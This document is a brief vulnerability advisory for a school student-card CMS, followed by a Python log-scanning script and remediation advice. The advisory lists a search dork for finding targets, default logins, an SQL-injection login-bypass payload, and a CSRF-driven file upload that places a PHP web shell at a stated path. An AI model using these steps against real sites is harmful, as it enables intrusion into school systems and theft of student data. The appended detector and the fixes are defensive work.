[+] Author : ./meicookies, developed by Kuroilotuz
[+] Title : Vulnerabilities in KARTU PELAJAR CMS, old version
[+] Dork : "Silahkan Login Untuk Akses System." , intitle:KARTU PELAJAR
======================================
[!] Default u/p : admin/admin for admin role and itstaf/itstaf for IT STAF role
[+] Admin login bypass bug (SQL injection)
use: ' or 1=1 limit 1 -- -+
[+] Arbitrary file upload with CSRF
[-] Exploit: trget.sch.id/dash_user/aksi/user_update.php
If the "Data Berhasil di Ubah" popup appears, it's vulnerable
[-] CSRF : http://kuroilotuz.site/csrf.php
POSTFILE : gambar
[?!] SHELL LOCATION : trget.sch.id/assets/img/user/"your shell.php"
#Make them aware ;)
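
[+] Added example (not part of the original advisory or the CMS's own code): a log check a site operator can run for the two upload-related indicators above, a POST to dash_user/aksi/user_update.php that did not come from the site's own pages, and any script requested from assets/img/user/. The combined log format, the host school.example and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Paths taken from the advisory above; everything else is an assumption.
UPDATE_PATH = "/dash_user/aksi/user_update.php"
UPLOAD_DIR = "/assets/img/user/"
SCRIPT_EXT = (".php", ".phtml", ".phar", ".php5")

# Apache/nginx "combined" access log format (assumed).
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"'
)

def scan(lines, site_host):
    """Return (reason, client_ip, path) tuples for lines an analyst should review."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        path = urlparse(m["uri"]).path
        # hostname is None for a missing ("-") Referer, which is also flagged.
        ref_host = urlparse(m["referer"]).hostname
        # A profile update submitted from another origin is the CSRF pattern.
        if m["method"] == "POST" and path == UPDATE_PATH and ref_host != site_host:
            findings.append(("cross-site-update", m["ip"], path))
        # Nothing executable should ever be requested from the user image directory.
        if path.startswith(UPLOAD_DIR) and path.lower().endswith(SCRIPT_EXT):
            findings.append(("script-in-upload-dir", m["ip"], path))
    return findings

# Constructed sample lines (documentation IP ranges, hypothetical hosts and file names).
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0700] "POST /dash_user/aksi/user_update.php HTTP/1.1" 200 312 "https://school.example/dash_user/" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2024:10:05:00 +0700] "POST /dash_user/aksi/user_update.php HTTP/1.1" 200 312 "http://other.example/form.html" "Mozilla/5.0"',
    '203.0.113.5 - - [01/Jan/2024:10:06:00 +0700] "POST /dash_user/aksi/user_update.php HTTP/1.1" 200 312 "-" "curl/8.0"',
    '192.0.2.10 - - [01/Jan/2024:10:07:00 +0700] "GET /assets/img/user/photo.jpg HTTP/1.1" 200 5120 "https://school.example/dash_user/" "Mozilla/5.0"',
    '203.0.113.5 - - [01/Jan/2024:10:08:00 +0700] "GET /assets/img/user/a.PHP?x=1 HTTP/1.1" 200 40 "-" "curl/8.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE, "school.example"):
        print(finding)
```

The durable fixes are on the application side: change the default passwords, use parameterized queries in the login, require a CSRF token on user_update.php, and restrict the "gambar" upload to image types stored where the server will not execute them.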